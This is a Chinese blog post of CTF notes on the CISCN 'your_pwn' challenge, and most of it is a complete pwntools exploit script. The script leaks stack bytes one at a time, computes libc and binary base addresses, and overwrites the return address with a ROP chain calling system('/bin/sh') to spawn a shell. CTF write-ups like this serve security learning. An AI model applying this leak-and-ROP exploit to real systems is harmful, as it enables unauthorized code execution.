CISCN-PWN(your_pwn)-笔记

简单的任意读任意写的题目,唯一的限制是每次只能读一个byte,保护全开

但是我对栈还是太生疏了,弄了半天没能搞清楚偏移,最后干脆全部输出,看看哪里有我要的东西。然后这次的exp相比以前还是要好很多的,用了lambda还有函数,写起来的确方便很多。希望以后能逐步地建立自己的exp框架,不用每次都重头写一遍

from pwn import *
from re import *

#sh = remote('1b190bf34e999d7f752a35fa9ee0d911.kr-lab.com', 57856)
sh = process('./pwn')

sla     = lambda delim,string       :sh.sendlineafter(delim,string)
rl      = lambda                    :sh.recvline()

def read(num,s):
    for i in range(8):
        sla('input index\n',str(num + i))
        a = rl()[15:-1]
        if a.find('ffffff') == 0:
            a = a[6:]
        if len(a) == 1:
	        a = '0' + a
        s += a
        n = int('0x' + a,16)
        sla('input new value\n',str(n))
    return s

def write(num,hexn):
    for i in range(8):
        sla('input index\n',str(num + i))
        rl()
        sla('input new value\n',str(int(hexn %( 16 ** 2))))
        hexn = int(hexn / (16 ** 2))

def again():
    sla('input index\n',str(0))
    sla('input new value\n',str(0))
    sla('(yes/no)? \n','yes')

def reverse(s):
    x = ''
    for i in range(len(s) / 2):
        x += s[(len(s)-2-2*i)]
        x += s[(len(s)-2-2*i+1)]
    return x

stdoutRegex = re.compile(r'20[0-9a-f]{10}')
mainRegex = re.compile(r'3f[0-9a-f]{10}')
system_off = 0x0000000000045390
stdout_off = 0x00000000003c5620
bin_off = 0x000000000018cd57
pop_off = 0x0000000000000d03
sla('name:','a')
out = 0
s = ''
for i in range(5):
    s = read(-40-i*8,s)
again()
stdout_addr = int('0x' + reverse(stdoutRegex.search(s).group(0)),16)
base = int('0x' + reverse(mainRegex.search(s).group(0)),16)
libc_base = stdout_addr - stdout_off
bin_addr = libc_base + bin_off
system_addr = system_off + libc_base
base = base + 0x61 - 0x3f
pop_addr = base - 0x0000000000000d61 + pop_off
success('pop_addr->{:#x}'.format(pop_addr))
success('bin_addr->{:#x}'.format(bin_addr))
success('system_addr->{:#x}'.format(system_addr))
write(344,pop_addr)
write(352,bin_addr)
write(360,system_addr)
sla('input index','a')

sh.interactive()

说点什么

avatar

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据

  Subscribe  
提醒